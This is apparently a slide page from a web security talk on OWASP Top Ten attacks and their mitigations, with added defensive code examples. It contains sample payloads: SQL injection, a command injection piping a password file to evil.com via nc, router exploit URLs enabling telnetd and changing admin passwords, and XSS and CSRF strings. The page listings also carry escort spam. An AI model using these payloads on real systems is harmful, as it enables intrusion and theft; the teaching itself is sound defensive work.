Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 

Recently uploaded (20)

Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 

Top Web Application Attacks and How to Prevent Them

  • 1. Attacking Web Applications Sasha Goldshtein CTO, Sela Group blog.sashag.net @goldshtn
  • 2. Sasha Goldshtein @goldshtn Every web developer must be aware of the most common web attacks, risks, and mitigations. Don’t fly blind.
  • 3. Sasha Goldshtein @goldshtn Typical Risks §  Exposure of user information -  Passwords, emails, identity theft §  Direct financial gain -  Credit card details §  Creating a botnet -  Using servers/user systems for malicious activity §  Denial of service §  Some serious damage™ -  Considering that more and more embedded systems serve stuff over HTTP
  • 4. Sasha Goldshtein @goldshtn Are They Really After Me? 1.  They could be, if you’re important. 2.  They are after your users. 3.  They are after your servers. 4.  They found you randomly on the web.
  • 5. OWASP Top Ten
    1.  Injection
    2.  Broken auth and session management
    3.  Cross-site scripting
    4.  Insecure direct object references
    5.  Security misconfiguration
    6.  Sensitive data exposure
    7.  Missing function level access control
    8.  Cross-site request forgery
    9.  Using vulnerable components
    10. Unvalidated redirects and forwards
  • 6. SQL Injection
    db.ExecuteReader("select * from users where (name='" + Request["user"] + "') and (password='" + Request["password"] + "')");
    §  Suppose the user request parameter is …
    ' or '1'='1
    §  Then the query we execute is …
    select * from users where (name='' or '1'='1') and (password='whatever')
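The slide's string-concatenated login query next to the parameterized form that fixes it, as an added example (not code from the talk). It uses an in-memory SQLite table with constructed sample rows; the `?` placeholders are the SQL query parameters slide 10 recommends. Plain-text passwords are used here only so the query behaviour is visible; slide 23 covers how they should actually be stored.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table (sample data, not from the talk)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (name text, password text)")
    conn.executemany(
        "insert into users values (?, ?)",
        [("alice", "correct horse"), ("bob", "battery staple")],
    )
    conn.commit()
    return conn


def login_concatenated(conn: sqlite3.Connection, user: str, password: str) -> list:
    """The pattern from the slide: the query text is built by concatenation,
    so a value containing a quote becomes part of the SQL grammar."""
    sql = (
        "select * from users where (name='" + user
        + "') and (password='" + password + "')"
    )
    return conn.execute(sql).fetchall()


def login_parameterized(conn: sqlite3.Connection, user: str, password: str) -> list:
    """Same query with '?' placeholders: the driver binds the values, so they
    can never change the structure of the statement, whatever they contain."""
    sql = "select * from users where (name=?) and (password=?)"
    return conn.execute(sql, (user, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "' or '1'='1"          # the value from the slide, in both fields
    print("concatenated:", login_concatenated(conn, payload, payload))   # every row
    print("parameterized:", login_parameterized(conn, payload, payload)) # no rows
    print("legitimate:", login_parameterized(conn, "alice", "correct horse"))
```

With the slide's value supplied as both `user` and `password`, the concatenated version evaluates `(name='' or '1'='1') and (password='' or '1'='1')` and returns every user; the parameterized version looks for a user literally named `' or '1'='1` and returns nothing.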
  • 8. OS Command Injection
    §  Suppose we’re too lazy to perform DNS lookup, so we resort to the following:
    system("nslookup " + Request["hostname"]);
    §  Suppose the hostname parameter is …
    foo || cat /etc/password | nc evil.com
    §  Then we end up sending the password file to evil.com!
    §  Most recent noisy exploit 10/9/2013 in DLink DIR-505 router firmware:
    request=ping_test&ip_addr=127.0.0.1; /usr/sbin/telnetd;
  • 10. Mitigating Injections
    §  DO NOT trust user input
    §  DO NOT run code provided by the user
    §  DO NOT use blacklists for validation
    §  DO use SQL query parameters (?, @param, :param)
    §  DO use whitelists and regexes for validation
    §  DO fuzz your code with invalid input
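Applying the whitelist, no-shell and fuzzing advice above to the `nslookup` lookup from slide 8, as an added example (not code from the talk). The hostname regex, the `nslookup` argv and the fuzz loop are this example's own choices; the safest variant resolves the name in-process and never spawns a command at all.

```python
import random
import re
import socket
import subprocess

# Whitelist: RFC 1123 hostname labels joined by dots. Nothing else is accepted,
# so shell metacharacters (; | & ` $ spaces ...) can never reach the command.
_LABEL = r"[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")


def is_valid_hostname(value: str) -> bool:
    # fullmatch, not match() with '$': '$' also matches before a trailing
    # newline, which would let "example.com\n" through.
    return len(value) <= 253 and _HOSTNAME_RE.fullmatch(value) is not None


def build_lookup_argv(hostname: str) -> list:
    """argv for the external lookup. The list form means no shell parses the
    string, so even a metacharacter that slipped past the whitelist would be
    passed to nslookup as a literal argument."""
    if not is_valid_hostname(hostname):
        raise ValueError(f"rejected hostname: {hostname!r}")
    return ["nslookup", hostname]


def lookup(hostname: str) -> str:
    """Shell-free equivalent of the slide's system("nslookup " + hostname)."""
    result = subprocess.run(build_lookup_argv(hostname), capture_output=True,
                            text=True, timeout=10, check=False)
    return result.stdout


def resolve(hostname: str) -> list:
    """Better still: use the resolver library and spawn nothing."""
    if not is_valid_hostname(hostname):
        raise ValueError(f"rejected hostname: {hostname!r}")
    return sorted({info[4][0] for info in socket.getaddrinfo(hostname, None)})


def fuzz_validator(rounds: int = 2000, seed: int = 1) -> int:
    """Minimal fuzz loop for the whitelist: random strings mixing hostname
    characters with shell metacharacters. Returns how many strings containing
    a metacharacter were wrongly accepted; the expected answer is 0."""
    rng = random.Random(seed)
    meta = ";|&`$(){}<>'\"\\ \n\t"
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789.-" + meta
    wrongly_accepted = 0
    for _ in range(rounds):
        candidate = "".join(rng.choice(alphabet) for _ in range(rng.randint(1, 40)))
        if is_valid_hostname(candidate) and any(c in meta for c in candidate):
            wrongly_accepted += 1
    return wrongly_accepted


if __name__ == "__main__":
    for value in ["example.com", "foo || cat /etc/password | nc evil.com",
                  "127.0.0.1; /usr/sbin/telnetd;"]:
        print(repr(value), "->", "accepted" if is_valid_hostname(value) else "rejected")
    print("fuzz: wrongly accepted =", fuzz_validator())
```

Both payloads from slide 8 are rejected before any command is built, and the fuzz loop is the cheap regression check that keeps the whitelist honest when someone later "relaxes" the regex.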
  • 11. Sessions and Cookies
    §  Most web applications today store sensitive user data in cookies
    §  At the very least, the session identifier is stored in a cookie
    -  Cookies are tasty
    §  Don’t store anything else in cookies and don’t trust them
    -  What if the client sends you:
    Cookie: username=dave;permissions=admin
  • 13. Sessions and URLs
    •  DO NOT embed session id in URLs
    •  DO NOT trust cookie contents
    •  DO NOT trust URL query string contents
    http://example.com/delete_account.php?account_name=sasha
    •  DO NOT use predictable session ids
    http://example.com/cart.php?sess=127
    •  DO use a Secure, HttpOnly cookie for session id
    •  DO use long, random session ids
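The session handling slides 11 and 13 describe, as an added example (not code from the talk): a long random session id, a `Secure; HttpOnly` cookie carrying only that id, and a server-side store that is the sole source of the user's identity and permissions, so a client-supplied `username=dave;permissions=admin` is simply ignored. The cookie name `sess`, the `SameSite=Lax` attribute and the in-memory store are this example's assumptions.

```python
import secrets
from http.cookies import SimpleCookie

# Server-side session store: opaque id -> attributes. Only the id ever leaves
# the server; the client never holds (or gets to assert) its own permissions.
SESSIONS = {}


def new_session_id() -> str:
    """32 random bytes (256 bits) from the CSPRNG, URL-safe encoded.
    Not a counter, not a timestamp: the next id is not guessable from this one."""
    return secrets.token_urlsafe(32)


def create_session(username: str, permissions: str) -> str:
    sid = new_session_id()
    SESSIONS[sid] = {"username": username, "permissions": permissions}
    return sid


def session_cookie_header(sid: str) -> str:
    """Set-Cookie value for the session id with the flags from slide 13:
    Secure (HTTPS only) and HttpOnly (not readable by page scripts), plus
    SameSite=Lax, which keeps the cookie off most cross-site requests."""
    cookie = SimpleCookie()
    cookie["sess"] = sid
    cookie["sess"]["secure"] = True
    cookie["sess"]["httponly"] = True
    cookie["sess"]["samesite"] = "Lax"
    cookie["sess"]["path"] = "/"
    return cookie.output(header="").strip()


def authorize(cookie_header: str) -> dict:
    """Resolve the caller from the Cookie request header. Only the session id
    is read; any other field the client sends (username=, permissions=) is
    never consulted, and an unknown id yields an anonymous result."""
    cookie = SimpleCookie()
    cookie.load(cookie_header)
    sid = cookie["sess"].value if "sess" in cookie else None
    session = SESSIONS.get(sid)
    if session is None:
        return {"username": None, "permissions": "none"}
    return dict(session)


if __name__ == "__main__":
    sid = create_session("alice", "user")
    print("Set-Cookie:", session_cookie_header(sid))
    # Constructed forged request: the client adds its own claims to the cookie.
    print(authorize(f"username=dave; permissions=admin; sess={sid}"))
    print(authorize("sess=127; permissions=admin"))   # predictable/unknown id
```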
  • 14. HTTP and HTTPS
    §  Surprisingly many web applications still use HTTP to transmit sensitive information
    §  Your HTTP traffic is freely available to:
    -  Your Starbucks barista
    -  Your family members
    -  Your ISP
    -  Your boss
    §  As a developer, you are responsible for your users’ sensitive information
  • 16. You Have Been Pineappled
    §  WiFi Pineapple is a mobile pentesting device
    -  ARM SOC, RAM, internal storage, USB storage, WiFi, Ethernet, 3G modem support
    §  Karma mode
    Is this the KatieHomeWiFi?
    Is this the Starbucks WiFi?
    Is this the JFKAirportWiFi?
    Sure
  • 18. Use HTTPS Correctly
    §  DO NOT send sensitive information over HTTP
    §  DO NOT display login pages over HTTP
    §  DO NOT load HTTP frames/scripts/images in an otherwise HTTPS page
    §  DO insist on pure HTTPS for sensitive pages
    §  DO use Secure cookies for sensitive data (reminder)
    And, as a user:
    §  DO NOT connect to unsecured Wi-Fi networks (like “Free WiFi” or “Fluent”)
    §  DO use a VPN in insecure environments
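A check for the third point above, as an added example (not code from the talk): a small scanner that walks a page's HTML and reports every script, frame, image, stylesheet or media element fetched over plain `http:`, plus any form that would submit over `http:`. It runs over a constructed sample page; the element/attribute table is this example's own choice, and protocol-relative `//` URLs are left alone because they inherit the page's scheme.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements whose URL attribute the browser fetches while rendering (mixed
# content), plus forms, whose action decides where credentials are sent.
_WATCH = {
    "script": ("src",), "img": ("src",), "iframe": ("src",), "frame": ("src",),
    "link": ("href",), "audio": ("src",), "video": ("src",), "source": ("src",),
    "object": ("data",), "embed": ("src",), "form": ("action",),
}


class MixedContentScanner(HTMLParser):
    """Collects (tag, attribute, url) for every watched attribute whose URL
    has an explicit http: scheme."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name in _WATCH.get(tag, ()):
                if urlsplit(value.strip()).scheme.lower() == "http":
                    self.findings.append((tag, name, value))


def find_mixed_content(html: str) -> list:
    scanner = MixedContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page (not from the talk): an HTTPS page with a mix of
# secure, protocol-relative and plain-HTTP subresources.
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="https://cdn.example/site.css">
<script src="http://cdn.example/jquery.js"></script>
</head><body>
<img src="//cdn.example/logo.png">
<iframe src="http://ads.example/frame.html"></iframe>
<form action="http://example.com/login" method="post">
  <input name="user"><input name="password" type="password">
</form>
<a href="http://example.com/about">About</a>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, url in find_mixed_content(SAMPLE_PAGE):
        print(f"{tag} {attr}={url}")
```

The `<a href>` is deliberately not reported: a link the user may follow is navigation, not a resource the HTTPS page loads. The script and frame findings are the ones that matter most, since an injected script or frame controls the whole page, and the form finding is slide 18's "login page over HTTP" in another guise.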
  • 19. Storing Sensitive Information
    §  DO NOT store anything you don’t have to store
    -  Least responsibility principle
    §  DO comply with regulation for secure storage
    -  E.g. if you store credit card details, you’re in for some pain
  • 22. “Password” unseated by “123456” on SplashData’s annual “Worst Passwords” list
    1.  123456
    2.  password
    3.  12345678
    4.  qwerty
    5.  abc123
    6.  123456789
    7.  111111
    8.  1234567
    9.  iloveyou
    10. adobe123
    11. 123123
    12. admin
    13. 1234567890
    14. letmein
    15. photoshop
    16. 1234
    17. monkey
    18. shadow
    19. sunshine
    20. 12345
    21. password1
    22. princess
    23. azerty
    24. trustno1
    25. 000000
  • 23. Password Storage
    §  DO NOT store passwords in clear text
    §  DO NOT store encrypted passwords
    §  DO hash and salt passwords
    §  DO reject weak passwords during signup
    §  DO consider using OAuth
    §  DISCUSS which hash function to use
    -  Super-slow (bcrypt) – subject to DOS
    -  Super-fast (MD5, SHA1) – subject to cracking
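Salted, slow password hashing plus a weak-password check, as an added example (not code from the talk). It uses PBKDF2-HMAC-SHA256 from the standard library, a per-password random salt, a constant-time comparison on verify, and slide 22's list (plus a minimum length) as the signup blacklist; the storage format and the iteration count are this example's choices. The iteration count is exactly the slow-versus-fast dial the last bullet asks you to discuss: high enough that offline cracking is expensive, low enough that a login does not become a denial-of-service lever.

```python
import hashlib
import hmac
import secrets

# Work factor: tune so one hash costs tens of milliseconds on your servers.
ITERATIONS = 600_000

# Slide 22's list; any of these (case-insensitively) or anything under 10
# characters is refused at signup.
WORST_PASSWORDS = {
    "123456", "password", "12345678", "qwerty", "abc123", "123456789", "111111",
    "1234567", "iloveyou", "adobe123", "123123", "admin", "1234567890", "letmein",
    "photoshop", "1234", "monkey", "shadow", "sunshine", "12345", "password1",
    "princess", "azerty", "trustno1", "000000",
}


def is_weak(password: str) -> bool:
    return len(password) < 10 or password.lower() in WORST_PASSWORDS


def hash_password(password: str) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'.
    The salt is fresh per password, so identical passwords get different
    hashes and a precomputed table is useless."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count (so old records keep
    working after ITERATIONS is raised) and compare in constant time."""
    algorithm, iterations, salt_hex, digest_hex = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    computed = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                   bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(computed, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    for candidate in ["123456", "Password1", "correct horse battery staple"]:
        print(repr(candidate), "weak" if is_weak(candidate) else "ok")
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))  # True
    print(verify_password("correct horse battery stable", record))  # False
```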
  • 24. Cross-Site Scripting (XSS)
    •  Injecting JavaScript into pages viewed by other users
    –  Cookie stealing, information disclosure
    –  DOM manipulation, tricking the user to like Facebook pages, phishing
    –  DDOS, bitcoin mining :)
    •  Temporary XSS
    http://searchengine.com/?q=<script>alert(1);</script>
    •  Persistent XSS
    –  You provide data to the server which is then permanently displayed when users visit
  • 26. Cross-Site Request Forgery (CSRF)
    §  Use the fact that the user is already authenticated to a website to generate requests on his behalf
    <img src="http://forum.com/delete_profile.php?confirmed=True" />
    §  Interesting variation: use CSRF to login into YouTube with the attacker’s credentials; then, Google history is stored into the attacker’s account
    -  “I used to know what you watched on YouTube”
  • 28. 70 Ways To Encode <
    <  %3C  &lt  &lt;  &LT  &LT;
    &#60  &#060  &#0060  &#00060  &#000060  &#0000060
    &#60;  &#060;  &#0060;  &#00060;  &#000060;  &#0000060;
    &#x3c  &#x03c  &#x003c  &#x0003c  &#x00003c  &#x000003c
    &#x3c;  &#x03c;  &#x003c;  &#x0003c;  &#x00003c;  &#x000003c;
    &#X3c  &#X03c  &#X003c  &#X0003c  &#X00003c  &#X000003c
    &#X3c;  &#X03c;  &#X003c;  &#X0003c;  &#X00003c;  &#X000003c;
    &#x3C  &#x03C  &#x003C  &#x0003C  &#x00003C  &#x000003C
    &#x3C;  &#x03C;  &#x003C;  &#x0003C;  &#x00003C;  &#x000003C;
    &#X3C  &#X03C  &#X003C  &#X0003C  &#X00003C  &#X000003C
    &#X3C;  &#X03C;  &#X003C;  &#X0003C;  &#X00003C;  &#X000003C;
    \x3c  \x3C  \u003c  \u003C
  • 29. Mitigating XSS and CSRF
    §  DO NOT trust user input (déjà vu?)
    §  DO NOT allow GETs to modify state
    §  DO NOT rely on blacklists
    §  DO escape and sanitize HTML provided by the user
    §  DO use whitelists or a non-HTML format like Markdown
    §  DO generate anti-CSRF tokens and validate them
    §  DO validate Referer headers
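The mitigations above applied to the XSS and CSRF cases from slides 24 and 26, as an added example (not code from the talk). Output escaping converts `<`, `>`, `&` and quotes on the way out, which is why the 70 encodings of slide 28 do not need a blacklist: whatever the input looked like, the rendered text cannot open a tag. The anti-CSRF token is an HMAC of the session id under a server secret, checked in constant time; the `delete_profile` handler name, the `forum.com` origin and the tolerance for an absent Referer are this example's assumptions.

```python
import hashlib
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Constructed per process for the example; in production it comes from
# configuration and is rotated like any other key.
SERVER_SECRET = secrets.token_bytes(32)
SITE_HOST = "forum.com"   # the origin from slide 26


def render_comment(user_text: str) -> str:
    """Escape on output, not on input. < > & " ' become entities, so user text
    can neither open a tag nor break out of an attribute, regardless of how
    the client encoded it."""
    return f'<p class="comment">{html.escape(user_text, quote=True)}</p>'


def csrf_token(session_id: str) -> str:
    """Token bound to the session: HMAC-SHA256(secret, session id). It goes
    into a hidden form field; a cross-site <img> or auto-submitted form on
    another origin cannot read it, so it cannot present it."""
    return hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, token) -> bool:
    return hmac.compare_digest(csrf_token(session_id), token or "")


def delete_profile(method: str, session_id: str, token, referer) -> str:
    """State-changing endpoint from slide 26, with the three checks from
    slide 29: POST only, Referer must be our own host when present (browsers
    and privacy tools sometimes strip it, so absence is tolerated here), and
    a valid per-session token."""
    if method != "POST":
        return "405 method not allowed"
    if referer is not None and urlsplit(referer).hostname != SITE_HOST:
        return "403 bad referer"
    if not csrf_token_valid(session_id, token):
        return "403 bad csrf token"
    return "200 profile deleted"


if __name__ == "__main__":
    print(render_comment("<script>alert(1);</script>"))
    sid = "session-123"                      # constructed session id
    tok = csrf_token(sid)
    # The slide's <img src=...delete_profile...> arrives as a GET with no token.
    print(delete_profile("GET", sid, None, "http://evil.example/"))
    print(delete_profile("POST", sid, tok, "http://evil.example/"))
    print(delete_profile("POST", sid, "guess", f"http://{SITE_HOST}/profile"))
    print(delete_profile("POST", sid, tok, f"http://{SITE_HOST}/profile"))
```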
  • 30. Admin Consoles
    §  DO NOT leave admin consoles exposed to the Internet
    §  DO NOT provide “extra helpful” troubleshooting info
    §  DO restrict admin consoles to local network only
    §  DO whitelist IP addresses if absolutely necessary
    Some auth cookies… yum!
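An application-level IP whitelist for an admin console, as an added example (not code from the talk), for the case where the console cannot simply be kept off the Internet. The decision is made on the TCP peer address only; the `X-Forwarded-For` header is accepted as a parameter purely to show that it is ignored, because any client can set it. The networks listed are constructed sample ranges.

```python
import ipaddress

# Constructed sample ranges: the office LAN, a management VLAN and loopback.
ADMIN_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.1.0/24"),
    ipaddress.ip_network("127.0.0.0/8"),
]


def admin_access_allowed(peer_addr: str, allowed=None) -> bool:
    """True only if the socket's peer address lies in an allowed network.
    Anything unparsable is denied rather than treated as local."""
    networks = ADMIN_NETWORKS if allowed is None else allowed
    try:
        ip = ipaddress.ip_address(peer_addr)
    except ValueError:
        return False
    return any(ip in net for net in networks)


def serve_admin(peer_addr: str, x_forwarded_for=None) -> str:
    """Gate for the console. x_forwarded_for is deliberately unused: unless a
    trusted reverse proxy overwrites it, it is client-supplied text and would
    let an outside caller claim an internal address."""
    if not admin_access_allowed(peer_addr):
        # No "extra helpful" detail for the outside world: which ranges are
        # allowed, or why the check failed, stays in the server log.
        return "403 forbidden"
    return "200 admin console"


if __name__ == "__main__":
    print(serve_admin("10.1.2.3"))
    print(serve_admin("203.0.113.5"))
    print(serve_admin("203.0.113.5", x_forwarded_for="10.0.0.1"))
```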
  • 32. DLink DIR-615 and DIR-300 Security Advisory
    •  OS command injection
    http://<IP>/tools_vct.xgi?set/runtime/switch/getlinktype=1&set/runtime/diagnostic/pingIp=1.1.1.1`telnetd`&pingIP=1.1.1.1
    •  CSRF to change admin password and enable remote administration (Internet-facing)
    http://<IP>/tools_admin.php?ACTION_POST=1&apply=Save+Settings&admin_name=admin&admin_password1=admin1&admin_password2=admin1&grap_auth_enable_h=0&rt_enable=on&rt_enable_h=1&rt_ipaddr=0.0.0.0&rt_port=8080
    •  Information disclosure
    http://<IP>/DevInfo.txt
    •  Insecure password storage
    $ cat var/etc/httpasswd
    admin:admin
  • 33. Summary & Call To Action
    §  Be aware of security risks and typical vulnerabilities
    §  Ensure your developers get up-to-date security training
    §  Learn how to use the mitigation and prevention tools in your Web framework
    §  Review code for security, not just correctness
    §  If your web app is secure, attackers will try other routes
  • 34. Thank You!
    Sasha Goldshtein, CTO, Sela Group
    blog.sashag.net
    @goldshtn